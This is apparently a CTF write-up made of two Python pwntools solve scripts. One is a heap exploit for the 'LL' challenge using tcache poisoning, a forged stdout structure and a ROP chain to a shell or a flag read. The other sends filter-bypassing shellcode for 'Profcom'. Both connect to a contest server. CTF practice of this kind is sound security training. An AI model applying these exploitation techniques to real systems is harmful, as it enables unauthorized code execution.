![image](https://hackmd.io/_uploads/H1o4Vk34yg.png)

# pwn/LL

![image](https://hackmd.io/_uploads/BJOeH12E1e.png)

```
python3 solve.py [LOCAL | REMOTE] [EXECVE | ORW]
```

```python=
#!/usr/bin/env python3
# CTF solve script for the "LL" heap challenge (pwntools).
# Interaction helpers wrap the target's numbered menu; `main` performs the
# leaks and the final ROP-chain write. All heap/libc offsets below are
# specific to the challenge's patched binary and shipped libc.
from pwn import *

exe = ELF("./ll_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe


def conn():
    """Return a tube to the target.

    `LOCAL` runs the patched binary; any other argument (the usage line
    calls it `REMOTE`) connects to the CTF instance.
    """
    if args.LOCAL:
        r = process([exe.path])
    else:
        r = remote("154.26.136.227", 40266)
    return r


# The helpers below use the module-level tube `r` set in __main__.

def add_num_array(ID: int, count: int, array: list[int]) -> None:
    """Menu option 1: create a number array `ID` holding `count` values."""
    r.sendlineafter(b"Your choice: ", b"1")
    r.sendlineafter(b"ID: ", str(ID).encode())
    r.sendlineafter(b"How many numbers do you want to input? ", str(count).encode())
    for i in range(count):
        r.sendline(str(array[i]).encode())


def delete_num_array(ID: int) -> None:
    """Menu option 2: free the number array with the given `ID`."""
    r.sendlineafter(b"Your choice: ", b"2")
    r.sendlineafter(b"ID: ", str(ID).encode())


def view_num_array(ID: int) -> None:
    """Menu option 3: print the array `ID`; the caller parses the output."""
    r.sendlineafter(b"Your choice: ", b"3")
    r.sendlineafter(b"ID: ", str(ID).encode())


def edit_num_array(ID: int, new_array: list[int]) -> None:
    """Menu option 4: overwrite the values of array `ID` in order."""
    r.sendlineafter(b"Your choice: ", b"4")
    r.sendlineafter(b"ID: ", str(ID).encode())
    for num in new_array:
        r.sendline(str(num).encode())


def add_name_array(index: int, size: int, name: bytes) -> None:
    """Menu option 5: allocate a name buffer at slot `index` and fill it.

    `size` is the full chunk size; 0x10 is subtracted so the request
    matches the program's prompt (presumably the malloc header — confirm).
    """
    r.sendlineafter(b"Your choice: ", b"5")
    r.sendlineafter(b"Index: ", str(index).encode())
    r.sendlineafter(b"Size: ", str(size-0x10).encode())
    r.send(name)


def delete_name_array(index: int) -> None:
    """Menu option 6: free the name buffer at slot `index`."""
    r.sendlineafter(b"Your choice: ", b"6")
    r.sendlineafter(b"Index: ", str(index).encode())


def main():
    """Run the full exploit against the tube in `r`.

    Steps, in order: corrupt the number-array linked list to obtain a
    heap leak, add a fake node through a name buffer to obtain a libc leak,
    redirect tcache allocations onto stdout (stack leak via `environ`) and
    onto the stack, then store a ROP chain there and trigger it with menu
    option 7. The chain is selected by the pwntools args `ORW` or `EXECVE`.
    """
    main_arena_offset = 0x203ac0
    print("[*] main_arena offset: ", hex(main_arena_offset))

    add_num_array(1, 4, [0, 0x621, 0, 0])  # ID = 1
    add_num_array(2, 2, [222, 222])  # ID = 2
    add_num_array(3, 2, [333, 333])  # ID = 3
    # head -> 1 -> 2 -> 3 -> NULL
    delete_num_array(2)
    # head -> 1 -> 3 -> NULL
    # 2 -> 3 -> NULL
    add_num_array(2, 2, [222, 222])  # ID = 2
    delete_num_array(3)
    # head -> 1 -> 2 -> 3 -> 2 -> 3....
    # tcache[size = 0x230] -> 3

    # Leak heap
    # Node 3 is freed but still reachable from the list, so viewing it
    # prints the chunk's tcache metadata: index 0 is the (safe-linked)
    # `next` field, index 1 the tcache key.
    view_num_array(3)
    r.recvuntil(b"Number at index 0 is: ")
    # With an otherwise empty bin the mangled `next` is just addr >> 12,
    # so shifting back yields the heap base (presumably — confirm).
    heap = int(r.recv(11), 16) << 12
    r.recvuntil(b"Number at index 1 is: ")
    key_check = int(r.recvline()[:-1], 16)
    print("[*] heap: ", hex(heap))
    print("[*] key check: ", hex(key_check))

    num_1_addr = heap + 0x4d0

    # Fake list node placed inside a name buffer: a 0x61 chunk header,
    # ID 3 / count 2, and a `next` pointing at node 1's data.
    payload = b"\x00"*0x1b0 + p64(0) + p64(0x61)
    payload += p64(0) * 6 + p32(3) + p32(2)  # ID and count
    payload += p64(num_1_addr + 0x10)  # next pointer
    payload += p64(0) * 2
    add_name_array(0, 0x228, payload)  # index 0
    #head -> 1 -> 2 -> 3 -> 0 (FAKE) -> NULL
    delete_num_array(0)
    #head -> 1 -> 2 -> 3 -> NULL

    # Leak libc
    # Node 1 (0x621 fake size) now carries an unsorted-bin pointer at
    # index 2; subtract its arena offset to get the libc base.
    view_num_array(1)
    r.recvuntil(b"Number at index 2 is: ")
    libc.address = int(r.recv(14), 16) - 0x203b20  # unsorted bin offset
    print("[*] libc: ", hex(libc.address))
    print("[*] main_arena: ", hex(libc.address + main_arena_offset))
    #print("heap set-arena ", hex(libc.address + main_arena_offset))

    # good luck pwning :)
    add_name_array(1, 0x68, b"index_1")
    add_name_array(2, 0x68, b"index_2")
    delete_name_array(2)
    delete_name_array(1)

    _IO_2_1_stdout_ = libc.sym['_IO_2_1_stdout_']
    environ = libc.sym['environ']
    # Rewrite the freed 0x70 chunk's `next` with a safe-linking-mangled
    # pointer ((pos >> 12) ^ target) so the next 0x68 allocation lands on
    # _IO_2_1_stdout_; the tcache key is kept so the free path is unchanged.
    edit_num_array(1, [0, 0x71, ((num_1_addr+0x10) >> 12) ^ (_IO_2_1_stdout_-0x10), key_check])
    add_name_array(1, 0x68, b"index_1")

    # Forged _IO_FILE for stdout: flags plus write/buffer pointers around
    # `environ`, so the next flush prints the stack address stored there.
    payload = p64(0xfbad1800) + p64(0)*3
    payload += p64(environ)  # write_base
    payload += p64(environ+8)
    payload += p64(environ+8)*2
    payload += p64(environ+8+1)
    add_name_array(2, 0x68, payload)

    stack_leak = u64(r.recvuntil(b"Add name successfully", drop=True))
    rbp = stack_leak - 0x138  # distance from environ to the target frame
    print("[*] rbp: ", hex(rbp))

    # Same mangled-`next` trick on the 0x230 bin so that the next 0x228
    # name allocation (and the number array that follows) sits on the stack.
    add_num_array(99, 2, [0xdead, 0xbeef])
    delete_num_array(99)
    delete_name_array(0)
    edit_num_array(3, [((heap+0x930) >> 12 ) ^ rbp, key_check])
    add_name_array(0, 0x228, b"index_0")

    ### GADGETS
    # Offsets are for the shipped libc.so.6 only.
    pop_rax_ret = libc.address + 0x00000000000dd237
    pop_rdi_ret = libc.address + 0x000000000010f75b
    pop_rsi_ret = libc.address + 0x0000000000110a4d
    #0x00000000000ab891: pop rdx; or byte ptr [rcx - 0xa], al; ret;
    pop_rdx = libc.address + 0x00000000000ab891
    pop_rcx_ret = libc.address + 0x00000000000a876e
    syscall_ret = libc.address + 0x0000000000098fa6
    flag_address = rbp+0xc0  # where the trailing "./flag" qword ends up
    binsh = next(libc.search(b'/bin/sh'))
    system = libc.sym['system']
    ###

    # num_win[0] lands on the saved rbp slot; the chain starts after it.
    num_win = [0]
    ### ORW
    if args.ORW:
        # open("./flag", O_RDONLY)
        num_win.append(pop_rax_ret)
        num_win.append(2)
        num_win.append(pop_rdi_ret)
        num_win.append(flag_address)
        num_win.append(pop_rsi_ret)
        num_win.append(0)
        num_win.append(syscall_ret)
        # rcx is pointed at writable stack first, presumably so the
        # `or byte ptr [rcx - 0xa], al` side effect of pop_rdx is harmless.
        num_win.append(pop_rcx_ret)
        num_win.append(rbp-0x200)
        num_win.append(pop_rdx)
        num_win.append(0x100)
        # read(4, flag_address, 0x100) -- assumes the new fd is 4
        num_win.append(pop_rax_ret)
        num_win.append(0)
        num_win.append(pop_rdi_ret)
        num_win.append(4)
        num_win.append(pop_rsi_ret)
        num_win.append(flag_address)
        num_win.append(syscall_ret)
        # write(1, flag_address, 0x100) -- rsi/rdx carried over
        num_win.append(pop_rax_ret)
        num_win.append(1)
        num_win.append(pop_rdi_ret)
        num_win.append(1)
        num_win.append(syscall_ret)
        num_win.append(u64(b"./flag".ljust(8, b"\x00")))
    ###
    elif args.EXECVE:
        ### sys execve
        # execve("/bin/sh", NULL, <rdx as left by the program>)
        num_win.append(pop_rsi_ret)
        num_win.append(0)
        num_win.append(pop_rdi_ret)
        num_win.append(binsh)
        num_win.append(pop_rax_ret)
        num_win.append(59)
        num_win.append(syscall_ret)
    ###
    # This number array is the allocation redirected onto the stack, so its
    # contents become the return-address chain; option 7 returns into it.
    add_num_array(0x1337, len(num_win), num_win)
    #input()
    r.sendlineafter(b"Your choice: ", b"7")
    r.interactive()


if __name__ == "__main__":
    global r
    r = conn()
    main()
```

# pwn/Profcom

![image](https://hackmd.io/_uploads/BJkQrynEJg.png)

```
python3 solve.py
```

```python=
#!/usr/bin/env python3
# CTF solve script for "Profcom": a shellcode challenge with a syscall
# filter. The module string below records which syscalls were blocked, the
# substitutes used, and the disassembly of the shellcode sent in `main`.
from pwn import *

exe = ELF("./pro_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe

'''
block: read, readv, preadv -> use pread64
block: open -> use openat
block: write, pwritev -> use writev

   0:   64 48 8b 1c 25 00 03    mov    rbx,QWORD PTR fs:0x300
   7:   00 00
   9:   83 ef 64                sub    edi,0x64
   c:   48 8b b3 d8 fe ff ff    mov    rsi,QWORD PTR [rbx-0x128]
  13:   48 81 ee 4d af 03 00    sub    rsi,0x3af4d
  1a:   b0 ff                   mov    al,0xff
  1c:   ff c0                   inc    eax
  1e:   ff c0                   inc    eax
  20:   0f 05                   syscall
  22:   89 c7                   mov    edi,eax
  24:   48 8d b3 00 fc ff ff    lea    rsi,[rbx-0x400]
  2b:   b2 ff                   mov    dl,0xff
  2d:   30 c0                   xor    al,al
  2f:   04 11                   add    al,0x11
  31:   0f 05                   syscall
  33:   48 89 33                mov    QWORD PTR [rbx],rsi
  36:   be 00 01 00 00          mov    esi,0x100
  3b:   48 89 73 08             mov    QWORD PTR [rbx+0x8],rsi
  3f:   8b 7b b0                mov    edi,DWORD PTR [rbx-0x50]
  42:   48 89 de                mov    rsi,rbx
  45:   48 31 d2                xor    rdx,rdx
  48:   ff c2                   inc    edx
  4a:   b0 14                   mov    al,0x14
  4c:   0f 05                   syscall
'''


def conn():
    """Return a tube connected to the remote CTF instance."""
    r = remote("154.26.136.227", 31879)
    return r


def main():
    """Send the shellcode (see the listing above) and print the flag.

    The code is padded to 0x68 bytes and followed by the NUL-terminated
    path "./flag", which the shellcode locates relative to a TLS pointer
    (per the listing; offsets are specific to this build). The response is
    read up to the closing brace of the flag.
    """
    r = conn()
    shellcode1 = b"\x64\x48\x8B\x1C\x25\x00\x03\x00\x00\x83\xEF\x64\x48\x8B\xB3\xD8\xFE\xFF\xFF\x48\x81\xEE\x4D\xAF\x03\x00\xB0\xFF\xFF\xC0\xFF\xC0\x0F\x05\x89\xC7\x48\x8D\xB3\x00\xFC\xFF\xFF\xB2\xFF\x30\xC0\x04\x11\x0F\x05\x48\x89\x33\xBE\x00\x01\x00\x00\x48\x89\x73\x08\x8B\x7B\xB0\x48\x89\xDE\x48\x31\xD2\xFF\xC2\xB0\x14\x0F\x05"
    shellcode1 = shellcode1.ljust(0x68, b"\x00")
    shellcode1 += b"./flag\x00"
    r.sendlineafter(b"Shellcode: ", shellcode1)
    # Bounded wait so a failed run does not hang before interactive().
    a = r.recvuntil(b"}", timeout=2)
    print(b"[*] flag: " + a)
    r.interactive()


if __name__ == "__main__":
    main()
```